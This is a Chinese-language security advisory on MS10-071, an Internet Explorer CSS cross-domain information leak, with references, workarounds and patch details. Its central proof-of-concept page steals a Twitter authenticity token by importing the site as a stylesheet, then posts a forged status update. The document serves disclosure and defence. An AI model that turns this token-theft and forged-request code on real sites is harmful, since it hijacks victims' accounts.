安全研究
安全漏洞
Microsoft IE CSS处理跨域信息泄露漏洞(MS10-071)
发布日期:2010-09-06
更新日期:2010-10-12
受影响系统:
Microsoft Internet Explorer 8.0描述:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0
BUGTRAQ ID: 42993
CVE(CAN) ID: CVE-2010-3325
Internet Explorer是Windows操作系统中默认捆绑的web浏览器。
Internet Explorer允许包含跨来源的内容,且CSS解析器在处理内容时是容错的。如果用户在页面中注入某些内容并以样式表的方式导入,就可以获得其他域中网页的敏感信息。
<*来源:Chris Evans (chris@ferret.lmh.ox.ac.uk)
链接:http://secunia.com/advisories/41271/
http://marc.info/?l=full-disclosure&m=128355357627660&q=p5
http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA10-285A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<head>
<style>
@import url("http://twitter.com/scarybeaststest");
</style>
<script>
function loaded() {
var borrowed = document.body.currentStyle.fontFamily;
var i = borrowed.indexOf("authenticity_token = '");
if (i == -1) {
alert('Unable to locate authenticity token... fail will commence.');
} else {
document.getElementById('stuff').innerText = 'READY... press button to post to your twitter account.';
}
borrowed = borrowed.substring(i + 22);
i = borrowed.indexOf("'");
if (i == -1) {
alert('WTF?');
}
borrowed = borrowed.substring(0, i);
document.getElementById('here').value = borrowed;
}
</script>
</head>
<body onload="loaded()">
<button onclick="document.getElementById('form').submit()">CLICK TO POST TO YOUR TWITTER ACCOUNT - THIS COULD BE AUTOMATED</button>
<p>
<form id ="form" action="http://twitter.com/status/update" method="POST">
<input size="80" type="text" name="status" value="@scarybeasts would like the IE CSS bug fixed"/>
<p>
<input size="60" type="text" id="here" name="authenticity_token" value="value pending"/>
</form>
It will say READY here if it worked... then press the button with tweet text of your choice :)
<div id="stuff"></div>
</body>
</html>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS10-071)以及相应补丁:
MS10-071:Cumulative Security Update for Internet Explorer (2360131)
链接:http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true
浏览次数:2860
严重程度:0(网友投票)
绿盟科技给您安全的保障